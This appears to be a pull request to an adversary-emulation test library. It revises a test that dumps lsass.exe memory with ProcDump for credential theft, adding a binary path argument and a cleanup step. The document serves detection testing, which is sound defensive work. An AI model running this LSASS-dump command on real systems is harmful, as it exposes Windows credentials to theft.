### PR TITLE
Improve test 5 (ProcDump) for T1003 that performs Credential Dumping

### DIFF
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -68,18 +68,27 @@ atomic_tests:
   description: |
     The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
     ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
+
   supported_platforms:
     - windows
+
   input_arguments:
+    procdump_binary_path:
+      description: Path of the ProcDump binary
+      type: string
+      default: $PathToAtomicsFolder\T1003\bin\procdump64.exe
     output_file:
       description: Path where resulting dump should be placed
       type: Path
-      default: lsass_dump.dmp
+      default: C:\Windows\Temp\lsass_dump.dmp
+
   executor:
     elevation_required: true
     name: command_prompt
     command: |
-      procdump.exe -accepteula -ma lsass.exe #{output_file}
+      #{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
+    cleanup_command: |
+      rm "#{output_file}"
 
 - name: Dump LSASS.exe Memory using Windows Task Manager
   description: |


### PR DESCRIPTION
**Details:**
- Add cleanup command for test 5
- Add path where procdump binary should be placed

**Testing:**
Tested on Windows 10 (10.0.14393)

**Associated Issues:**
None